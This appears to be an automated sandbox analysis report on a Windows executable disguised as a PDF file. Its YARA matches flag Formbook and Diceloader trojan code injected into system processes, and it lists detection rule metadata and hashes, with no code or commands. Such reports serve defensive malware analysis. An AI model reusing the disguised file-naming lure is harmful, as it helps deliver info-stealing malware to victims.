Source: 101 2043 5770 pdf.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: 101 2043 5770 pdf.exe	Binary or memory string: OriginalFilename vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2294564092.00007FF6803A6000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.E1 vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000019.00000000.2321404390.00007FF6803A6000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000019.00000002.2346157181.000001EC01830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe.0.dr	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe

Yara signature match

Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
